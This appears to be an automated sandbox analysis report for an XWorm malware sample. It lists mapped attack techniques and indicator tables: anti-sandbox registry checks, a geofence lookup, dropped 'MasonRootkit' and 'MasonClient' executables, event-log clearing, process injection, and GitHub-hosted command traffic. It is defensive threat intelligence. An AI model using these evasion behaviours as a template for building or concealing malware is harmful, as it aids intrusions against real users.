xworm | b19785992fe57f8f4ab7c7fc7d067a6d3c0832252afc5f13d6e165afefcff90b

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	MasonClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	MasonRootkit.exe

Executes dropped EXE 4 IoCs

pid	Process
4980	MasonRootkit.exe
1040	MasonRootkit.exe
5324	MasonClient.exe
4484	MasonClient.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
28	raw.githubusercontent.com
29	raw.githubusercontent.com
34	raw.githubusercontent.com
122	raw.githubusercontent.com

Drops file in System32 directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1040 set thread context of 3812	1040	MasonRootkit.exe	100

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
4532	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 23 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property	mousocoreworker.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018C01037265568 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000006aaa5a8a78ef6247afb8d5e66ee22add000000000200000000001066000000010000200000004fb5267e28353fab7cc93ca56bbecd94d073bbc74342afb45168a07e7dd45fbe000000000e8000000002000020000000fb15025b3f5d382f05a11c59e0e9b3b9e4d09eea2bab1a7f8d6bb8995457c78c80000000ea5450aafc6d78bd44cd8946f3fabbe4acff3e10183c92f125d1a931b89a360f2fc216af76aefa0ab62c699e45855838877a70c929ccc714c2d8e1bbab07cee297cf1ba8e449f542699d7b832cda6e0d0e7c6b782b5fce80d57d55195e836918b1c3b5bb9301ea25d175605a3353fd0bc7d0cc0a28bbeeac7fc2556e4d202c5940000000b4f831127a30efaf70f0ec255cfa827c2ca9081ef42e73676c6a9ded4adc6156171ba7d4bc1128ba2125a1523ef298b838ff317d188fb89cec96dd5c0e97293b	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={6E75927A-EA84-4F8F-95FC-2A90EA306FF6}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C01037265568"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000006aaa5a8a78ef6247afb8d5e66ee22add0000000002000000000010660000000100002000000095fc48061a248c8e36183b447c5256b6517cbc6f5440cdbd91fc4a70869871e1000000000e80000000020000200000000d7160941dce4f6a136b078f6afd66ec0e4c79d0c4f17738488c5ebc5a4fda3810060000664ae6c52f27207d4ce9953f003682663dc20ff7c4c7a93a1ab3a849082666f1cec7eb6d0344e3106e37f1086a0ac80eac15caf19a751ed1fbbe589b1ace997b023a41358551a7f03d76efb7e574d912b1161b6bc12eda4853b5dc3c69200e9cfec45c4c5fc36709ada14c5b2324e62e66275c9a7a1933ffc1ff2ef6aeb4361e9030156490310b59cd6efeea3cf2f3d8e95b76fba1cf052a71b9782d9be6be9d104c886dbd84c741cf70f9fec16758231f6268da0ec2825a70295e143486a61fb0debbcd5d9f5cb9ff877ca35a4433752797aec807ef7884f256cf81304febfff6c135dc8abb230a53aec2327ef5863b56813480a381b4fc0dbf190058160a822ebfabb7a64a67f42b755e3ae8f8f44b1ec38971e705680767ab673de5949ce02cc534d17b9e9d052322b5b83a339583eeedd8f3469d3b4fc0d76bb7778d587acf230c78c8789eae5d2928b9dcb680334976ed6735291c719c7e834d8b7b9e961214b94651494b5f611b05d8296a0dde949d2123a473b39d94d7ecd48375d854caf7e6db263d4fac70c6bc1d1d2c4945ba93519c6beeeecc87440635a570cb86c2d4c6593d3359917a00854e7b0d2135b8d9df173d073429ae3a712c45a73377f7ae4269221908005ad33456847ce187a6b44b8fea1032c40fe637fe84a91e67cb811c5468e35261a2e6799f78c341ecd2cf330a429ce2b9bcdbca3cf3b91187a25106f47d128fe4472984ff601ef15a2ca94ccb646952214c1e68449e99a975cd4131fa84f0670fd58f2c832723f874cc9da21fef42991376566c25748eb558199d14c2b0f1cab0d1144ec971515e4e8222c97a3f5d46773dcb27c36980b23567d4622211a4ab800daf4009171c1d4fa9d4b066d5208f87cfa25ab7257f059fa1fb8841b585d328745e39b667bc42578a29ece4f3e327b5eb4c91119399331f9a54d492fa3eb67378727043d5079c4d9961cf1543c05ca807bc6a5fe64f285b4cb2d02839cf8deff9fa466098e7ed8e3996a258f26d1b756f1f8a73ea93a2ae1c5e98cf25e8167c97a712c5535408ed0778d8ef4b43cc1fde774a5272970c66b2398e9ec23fef45fcabfff905a7b8892e4a96cb696c2b3155e3302debb63996c8f9a398f39cf0205c6896179e986f587b46a2e760eb46e0390c3fc1e7a4750ccc4ceb4ff5e0531619e137b089c3500db2301ef833c60a0e7c188cfd5c3bd15d01e0ae17d8d4d9ce6b166f6165538982d7af8d20db42985043a3f29fce1e0d6692ba98beac6092038ee8873567c750e1d6eb6fb004a2fe426db9451729ee4e7482553a86f9e4a873e913fcfb887b83a5856e074d925ff1702ed9bb4ac84a14938bdda32a88e26fc83cbbffadb0d5d3f931dd5d8ea2655e4e50ce12fd98f8b97ae614762728ead57b11bb069d00c8a4acea89ff094c620c13e640f4974c8eeddc8458f1b63b80d8a4bf06541c53755cc0c346f48b5942e561b47fed5d2b9d3b2cabb2b6205bdc4e929757cada4a22d2fec0a7195ef34d40d2918a99daadbb0b33e834f8f82c912bf95c52b8b9005cbde76d37cdf9919a988e634c4d1097db20f26329979aae439fd3a47a2a11d85fd4e901802ea2e18b2a88f2c9d62cb1b453399282195c9fee3520b4a084c42bc002ce95006eab99ec4687594c0669e8f7b660b84053e7219fae925909c5fb65639770ce777a6331f56283bb51683a29c27eff29ee7c8e408bda6c56dd0dfc3e0e2bdc20cfbd37bb5c333e6cd2a7acc6d1b73a44c6c8bb0a286e3bd260d42396bb1933c8bb6fcf22e2b64c74bb41614761ff766245d4f9bb1a226ab36e1ddb6d06f9b1c4de52192ab4e8f6729e67226c0c8c3f1d21f90a49ca38f809c69c2a61ff3fad049457c1f4a74655e5c436b70727d79aee5a826563562147206aa623e931ac79f39719c99aa6fda8b9b827e71e69a00014b18be1d477f04d01647464fb3faadf632605bbfec0565b27f435d96ae577d7a74734da0a2ab063ed81d25ff329655c8c325ba504804b9cf779031f63004aa8b16c27e835b44d5480b7d70ce14443199e4f36925d79bdb1d513e3fad442b8867167e9d97bdfeae2853e317b197dc7f05028d7bd621f1fc481bad2478a818444d7f200fe656718320193e04d19c2e5587e291e64b6531688334d4f3a35a4251ee884ff834d925345550362a0b5fa7c854000000045e2e4f57c123791f71b346667fee3fe60d6572f56beaf89b15df14655f0fe8dd5f5a8181c9420c5a1a0b48b01ce179be7caa1dfcda9231abcaadeabdfd91fbd	mousocoreworker.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1741136206"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 05 Mar 2025 00:56:47 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018C01037265568"	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856097628487537"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}	mousocoreworker.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1"	mousocoreworker.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8ee8df12-3c32-46df-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8ee8df12-3c32-46df- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\37bc8043-8c5f-49be-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b8bcfb66-e4f8-4ead- = 5cf7a256698ddb01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\89e00412-11f9-4268- = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d15e0305-a26a-4ee4- = "\\\\?\\Volume{241EF5C9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\38991bd3a4e096eddf2da41d645b9dfac1d969ee85d9be990448b6d60916dfd2"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc51e063-945d-40be- = "\\\\?\\Volume{241EF5C9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\f426a7f202c0bef436606b1819c1c9656c7df0eb5e5b1cef6af912f089c08f29"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8e9975d-01b6-4949- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8e9975d-01b6-4949- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000ac9bfc56698ddb0168f2f657698ddb0168f2f657698ddb01e4f509000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000655afa062000343135343661313134333634336362383536326532333934656437343535623038346638393936383235356266353762303736653031326635636437306634630000b20009000400efbe655afa06655afa062e000000000000000000000000000000000000000000000000003941f900340031003500340036006100310031003400330036003400330063006200380035003600320065003200330039003400650064003700340035003500620030003800340066003800390039003600380032003500350062006600350037006200300037003600650030003100320066003500630064003700300066003400630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000374c46771000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34313534366131313433363433636238353632653233393465643734353562303834663839393638323535626635376230373665303132663563643730663463000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000676f69676e77656a0000000000000000c85995649be9304fa5992dfa6fd26d66f383aaef44edef11ad466a30fd81d1a6c85995649be9304fa5992dfa6fd26d66f383aaef44edef11ad466a30fd81d1a6ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100370030003600300034003200330039002d003800350030003800360030003700350037002d0033003100310032003000300035003700310035002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c9f51e24000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\99d2a197-4a08-48d8- = 73b1b257698ddb01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\99d2a197-4a08-48d8- = "\\\\?\\Volume{241EF5C9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\0fb530fbb42a3e33fe88860cdb71466a8359a82a3210a2712c5b9fb8ebe0a61b"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8ee8df12-3c32-46df-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8e9975d-01b6-4949-	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc51e063-945d-40be- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\37bc8043-8c5f-49be- = 1f8e9156698ddb01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\37bc8043-8c5f-49be- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
